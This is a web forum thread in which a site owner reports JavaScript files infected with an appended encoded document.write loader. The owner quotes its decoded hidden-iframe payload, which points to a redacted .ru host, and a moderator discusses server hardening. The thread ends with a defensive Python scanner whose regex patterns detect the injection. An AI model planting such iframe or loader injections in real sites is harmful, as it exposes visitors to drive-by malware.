August 13, 2013 at 7:41 am #189677
FYI
I found malicious code in mysite.com/T3-assets/js_something.js. The code was encoded at the end of the file, and the decoded version is: "<div style="position:absolute; top:-508px;"><iframe src="http://jqueryXXXXXjsscript.ru/"></iframe></div>". (I added the "X" characters.)
Also, all folders which are writable by www-data have corrupted .htaccess and index_backup.php files.
I restored my site from the backups and now all is OK. Until next time… I have to leave some of the folders writable because of the functionality of the site – you know.
I’m NOT blaming anybody or anything, but IF you know how to prevent this kind of situation – please let me know.
-jukka määttä-
Manos (Moderator)
August 13, 2013 at 7:53 am #502048
Hi,
Can you please let me know your server setup? I mean, what’s your PHP version and if you are aware that modules like suhosin and suEXEC are installed.
This is not a Joomla or template issue; this is more like an issue with your server configuration.
Regards
Manos
August 13, 2013 at 9:43 am #502067
Hi Manos and thanks for the quick reply. I got this information from my web-service provider:
PHP Version 5.3.3-7+squeeze14
/etc/php5/apache2/conf.d/suhosin.ini
Suhosin:
This server is protected with the Suhosin Extension 0.9.32.1
Copyright (c) 2006-2007 Hardened-PHP Project
Copyright (c) 2007-2010 SektionEins GmbH
Directive Local Value Master Value
suhosin.apc_bug_workaround Off Off
suhosin.cookie.checkraddr 0 0
suhosin.cookie.cryptdocroot On On
suhosin.cookie.cryptkey [ protected ] [ protected ]
suhosin.cookie.cryptlist no value no value
suhosin.cookie.cryptraddr 0 0
suhosin.cookie.cryptua On On
suhosin.cookie.disallow_nul 1 1
suhosin.cookie.disallow_ws 1 1
suhosin.cookie.encrypt Off Off
suhosin.cookie.max_array_depth 50 50
suhosin.cookie.max_array_index_length 64 64
suhosin.cookie.max_name_length 64 64
suhosin.cookie.max_totalname_length 256 256
suhosin.cookie.max_value_length 10000 10000
suhosin.cookie.max_vars 100 100
suhosin.cookie.plainlist no value no value
suhosin.coredump Off Off
suhosin.disable.display_errors Off Off
suhosin.executor.allow_symlink Off Off
suhosin.executor.disable_emodifier Off Off
suhosin.executor.disable_eval Off Off
suhosin.executor.eval.blacklist no value no value
suhosin.executor.eval.whitelist no value no value
suhosin.executor.func.blacklist no value no value
suhosin.executor.func.whitelist no value no value
suhosin.executor.include.allow_writable_files On On
suhosin.executor.include.blacklist no value no value
suhosin.executor.include.max_traversal 0 0
suhosin.executor.include.whitelist no value no value
suhosin.executor.max_depth 0 0
suhosin.filter.action no value no value
suhosin.get.disallow_nul 1 1
suhosin.get.disallow_ws 0 0
suhosin.get.max_array_depth 50 50
suhosin.get.max_array_index_length 64 64
suhosin.get.max_name_length 64 64
suhosin.get.max_totalname_length 256 256
suhosin.get.max_value_length 512 512
suhosin.get.max_vars 100 100
suhosin.log.file 0 0
suhosin.log.file.name no value no value
suhosin.log.phpscript 0 0
suhosin.log.phpscript.is_safe Off Off
suhosin.log.phpscript.name no value no value
suhosin.log.sapi 0 0
suhosin.log.script 0 0
suhosin.log.script.name no value no value
suhosin.log.syslog no value no value
suhosin.log.syslog.facility no value no value
suhosin.log.syslog.priority no value no value
suhosin.log.use-x-forwarded-for Off Off
suhosin.mail.protect 0 0
suhosin.memory_limit 0 0
suhosin.mt_srand.ignore On On
suhosin.multiheader Off Off
suhosin.perdir 0 0
suhosin.post.disallow_nul 1 1
suhosin.post.disallow_ws 0 0
suhosin.post.max_array_depth 50 50
suhosin.post.max_array_index_length 64 64
suhosin.post.max_name_length 64 64
suhosin.post.max_totalname_length 256 256
suhosin.post.max_value_length 1000000 1000000
suhosin.post.max_vars 1000 1000
suhosin.protectkey On On
suhosin.request.disallow_nul 1 1
suhosin.request.disallow_ws 0 0
suhosin.request.max_array_depth 50 50
suhosin.request.max_array_index_length 64 64
suhosin.request.max_totalname_length 256 256
suhosin.request.max_value_length 1000000 1000000
suhosin.request.max_varname_length 64 64
suhosin.request.max_vars 1000 1000
suhosin.server.encode On On
suhosin.server.strip On On
suhosin.session.checkraddr 0 0
suhosin.session.cryptdocroot On On
suhosin.session.cryptkey [ protected ] [ protected ]
suhosin.session.cryptraddr 0 0
suhosin.session.cryptua Off Off
suhosin.session.encrypt On On
suhosin.session.max_id_length 128 128
suhosin.simulation Off Off
suhosin.sql.bailout_on_error Off Off
suhosin.sql.comment 0 0
suhosin.sql.multiselect 0 0
suhosin.sql.opencomment 0 0
suhosin.sql.union 0 0
suhosin.sql.user_postfix no value no value
suhosin.sql.user_prefix no value no value
suhosin.srand.ignore On On
suhosin.stealth On On
suhosin.upload.disallow_binary 0 0
suhosin.upload.disallow_elf 1 1
suhosin.upload.max_uploads 25 25
suhosin.upload.remove_binary 0 0
suhosin.upload.verification_script no value no value
Manos (Moderator)
August 13, 2013 at 10:44 am #502075
Hi,
Looks like your PHP is configured quite well; is this a VPS/dedicated box or what? Maybe you need to search the log files in order to find out who got access to your server.
Also, do you have everything updated? Joomla / Template / Modules / Plugins etc.?
The link/code you show us as a suspicious code makes me wonder that someone managed to “upload” files and “edit” files to your hosting environment.
Regards
Manos
August 13, 2013 at 12:45 pm #502080
OK – it seems like all the *.js files are contaminated… all JavaScript files have
;document.write(unescape('%3C%73%63%72%69%70%74%3E%0A%…
code-thing at the end of the file.
Nothing to do with Joomla!
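The checks this thread points to, as an added example (not code from either poster): a Python scan of a web root for .js files whose tail carries an encoded document.write(unescape(...)) that decodes to iframe or script markup, and for .htaccess / index_backup.php files in directories writable by group or other. The 4 KiB tail window, the permission-bit proxy for "writable by www-data", the known_good parameter and the sample string are assumptions of this example.

```python
import os
import re
import sys
from urllib.parse import unquote

# Appended loader of the shape quoted in the thread: document.write(unescape('%3C%73...'))
INJECT_RE = re.compile(
    r"""document\.write\(\s*unescape\(\s*(['"])((?:%[0-9A-Fa-f]{2})+)\1\s*\)\s*\)""")
MARKUP_RE = re.compile(r"<\s*(iframe|script)\b", re.I)  # what the decoded text writes
DROPPED_NAMES = {".htaccess", "index_backup.php"}  # file names reported in the thread
TAIL_BYTES = 4096  # assumption: the payload sits in the last 4 KiB of the file

# Constructed sample: harmless code with an encoded "<iframe>" appended.
SAMPLE = "var a = 1;\n;document.write(unescape('%3C%69%66%72%61%6D%65%3E'));"


def scan_text(text):
    """Return the decoded payload of every encoded document.write that emits markup."""
    hits = []
    for match in INJECT_RE.finditer(text):
        decoded = unquote(match.group(2), encoding="latin-1")  # unescape() is Latin-1
        if MARKUP_RE.search(decoded):
            hits.append(decoded)
    return hits


def scan_js(path):
    """Scan only the tail of a .js file, where the thread found the payload."""
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)
        fh.seek(max(0, fh.tell() - TAIL_BYTES))
        return scan_text(fh.read().decode("latin-1"))


def scan_tree(root, known_good=()):
    """Report injected .js files, and dropped file names in group/other-writable dirs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        writable = bool(os.stat(dirpath).st_mode & 0o022)  # proxy for "www-data can write"
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if name.endswith(".js"):
                findings += [("js-injection", rel, p) for p in scan_js(os.path.join(root, rel))]
            elif writable and name in DROPPED_NAMES and rel not in known_good:
                findings.append(("dropped-file", rel, ""))
    return sorted(findings)


if __name__ == "__main__":
    for kind, rel, payload in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(kind, rel, payload[:80])
```

Pass the relative paths of any .htaccess files the site legitimately ships as known_good, and compare remaining hits against a clean backup before deleting anything.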
This topic contains 6 replies, has 2 voices, and was last updated by Manos 11 years, 3 months ago.